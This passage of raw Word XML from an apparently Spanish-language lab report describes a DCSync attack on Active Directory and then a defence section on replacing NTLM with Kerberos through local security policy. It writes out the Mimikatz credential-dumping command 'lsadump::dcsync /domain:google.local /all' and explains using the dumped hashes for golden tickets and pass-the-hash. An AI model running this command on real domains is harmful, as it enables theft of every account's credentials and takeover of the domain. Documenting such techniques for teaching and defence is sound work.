        <w:t>n ataque DCSync es un ataque que aprovecha una función de replicación de contraseñas de Active Directory para obtener acceso no autorizado a cuentas de usuario privilegiadas y otros recursos de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F147BF1" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F9A37E" w14:textId="41452679" w:rsidR="003151C5" w:rsidRPr="003151C5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14E1CBBF" wp14:editId="3552256B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="15089961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445B1C73" w14:textId="0E55A72D" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5">
                            <w:r>
                              <w:t>lsadump::dcsync /domain:google.local /all</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FC8B217" w14:textId="38F092E0" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5">
                            <w:r>
                              <w:t>Elegimos el tipo de ataque indicamos el dominio y un all, para que saque todas las contraseñ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1CBBF" id="_x0000_s1050" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517360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&#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DSkMwq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445B1C73" w14:textId="0E55A72D" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5">
                      <w:r>
                        <w:t>lsadump::dcsync /domain:google.local /all</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4FC8B217" w14:textId="38F092E0" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5">
                      <w:r>
                        <w:t>Elegimos el tipo de ataque indicamos el dominio y un all, para que saque todas las contraseñas.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003151C5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003151C5">
        <w:instrText xml:space="preserve"> HYPERLINK "https://gist.github.com/S3cur3Th1sSh1t/ef2f2b296e26b18c361e40a3d1c2fda5" </w:instrText>
      </w:r>
      <w:r w:rsidR="003151C5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FFA714" w14:textId="2C267BC8" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A7FA2" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C66241C" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48992717" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DF9003" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E091776" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D6C779" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B18FC50" w14:textId="18572E9C" w:rsidR="003151C5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63A3CD84" wp14:editId="6F4D94E2">
            <wp:extent cx="5400040" cy="683260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1758332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32890" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId178" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="683260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ADE802" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4471AE" w14:textId="7D64A75A" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo todos los hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8139D" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A4D818" w14:textId="5B12D64C" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB40230" wp14:editId="02DD9664">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2121664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64347" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C9DCD" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38951E06" w14:textId="5C62A633" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8EECE2" wp14:editId="252211A6">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1387330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0733" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144E3E0" w14:textId="41D5E603" w:rsidR="00AE4AB2" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="601854A8" wp14:editId="154E833C">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1402359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59204" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId181"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52BEE012" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40510BB6" w14:textId="257D8602" w:rsidR="00DE12E5" w:rsidRDefault="00BE18C7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Pudimos obtener el hash que nos permite crear un ticket dorado para acceder a cualquier servicio dentro del dominio y el hash de administrador que podemos usar con la técnica de pass-the-hash y autentificarnos en el controlador de dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D31E50" w14:textId="77777777" w:rsidR="00BE18C7" w:rsidRDefault="00BE18C7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3145D49C" w14:textId="45D7B798" w:rsidR="00BE18C7" w:rsidRDefault="00BE18C7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE18C7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FAB207A" wp14:editId="1A084C9C">
            <wp:extent cx="5400040" cy="2718435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="266221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1355" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId182" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2718435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C19F508" w14:textId="77777777" w:rsidR="00A90C7E" w:rsidRDefault="00A90C7E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC4E63E" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1009A2" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D05020" w14:textId="4C2D08BA" w:rsidR="003D7556" w:rsidRDefault="003D7556" w:rsidP="003D7556">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc135575989"/>
      <w:r>
        <w:t>Defensa -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="7DC7BBE3" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262E96F2" w14:textId="27DAA4D7" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero lo que hay que hacer es desactivar las autentificaciones por NTLM y activar las de Kerberos, ahora pasare a indicar algunas razones de porque hacer esto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7ADAB" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8E2D33" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>1. Vulnerabilidades conocidas: NTLM ha demostrado tener varias vulnerabilidades a lo largo de los años. Estas vulnerabilidades podrían permitir ataques de fuerza bruta, robo de credenciales y ataques de paso de hash, lo que podría comprometer la seguridad de tu red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568BA38" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBCD520" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>2. Almacenamiento de credenciales en hash débil: NTLM almacena las credenciales de usuario como hashes débiles que pueden ser fácilmente descifrados por atacantes. Esto facilita el robo de contraseñas y el acceso no autorizado a las cuentas de usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50492436" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FF0190" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>3. Fuerza bruta y ataques de retransmisión: NTLM es vulnerable a ataques de fuerza bruta, donde un atacante intenta adivinar la contraseña utilizando múltiples intentos. También es susceptible a ataques de retransmisión, donde un atacante intercepta y retransmite solicitudes de autenticación para obtener acceso no autorizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBB1E6" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A14B46B" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>4. Compatibilidad con versiones antiguas: NTLM es un protocolo antiguo que se utiliza principalmente para la compatibilidad con versiones anteriores. Sin embargo, muchas aplicaciones y servicios modernos admiten Kerberos como método de autenticación preferido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A746C" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3430F6FA" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Al desactivar NTLM y habilitar Kerberos, estás mejorando la seguridad de tu red al utilizar un protocolo más seguro y resistente a ataques. Kerberos proporciona una autenticación más sólida y utiliza cifrado fuerte para proteger las credenciales de usuario durante la comunicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557FA0F2" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52680AF3" w14:textId="1C4E52BC" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="00C25D27">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Es importante destacar que antes de realizar cambios en la configuración de autenticación, debes evaluar el impacto en tus sistemas y aplicaciones existentes para garantizar una transición sin problemas. Además, es recomendable realizar pruebas exhaustivas y contar con un plan de respaldo en caso de problemas o incompatibilidades inesperadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B654C" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F909F63" w14:textId="61595835" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero presionaremos Windows + r, y allí escribiremos secpol.msc, que nos abrirá el editor de directivas de seguridad local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570DACC" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3594C569" w14:textId="1D584F56" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FE848BE" wp14:editId="1CD27137">
            <wp:extent cx="6645910" cy="4777105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="470323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3824" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="4777105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FACB4" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D924C96" w14:textId="7EB352E8" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a Directivas locales -&gt; Opciones de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1D451" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E954134" w14:textId="75802CCA" w:rsidR="00C25D27" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51432EA1" wp14:editId="3ADAB7D8">
            <wp:extent cx="6645910" cy="5050155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90028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8161" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5050155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CD28C" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4AFCBC" w14:textId="2F2C5C98" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y nos moveremos a Seguridad de red: nivel de autentificación de Lan Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0653E5" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A020366" w14:textId="0F45196E" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Pulsaremos botón derecho y propiedades e elegiremos esta opción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58450D6B" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5E0BA2" w14:textId="293172D7" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="690F5F05" wp14:editId="0DBD3682">
            <wp:extent cx="3980952" cy="4866667"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="145500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0709" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3980952" cy="4866667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158EF01" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581980C6" w14:textId="3E46D75C" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora buscaremos esta directiva:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008FA1B3" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C5893B" w14:textId="63698BB6" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63219EF4" wp14:editId="636AF6C8">
            <wp:extent cx="6645910" cy="5057140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="188097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71155" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId186">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="5057140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69615C8B" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC60D0D" w14:textId="7B43797F" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le daremos a propiedades y configuraremos como </w:t>
      </w:r>
      <w:r w:rsidR="00F45841">
        <w:t>en la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pantalla siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3953141D" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422C8DE4" w14:textId="77777777" w:rsidR="00F85BD6" w:rsidRDefault="00F85BD6" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FA8D75" w14:textId="08A8524B" w:rsidR="00F85BD6" w:rsidRDefault="00F45841" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C69AFEF" wp14:editId="3D8F2F81">
            <wp:extent cx="3971429" cy="4847619"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="619380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0160" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
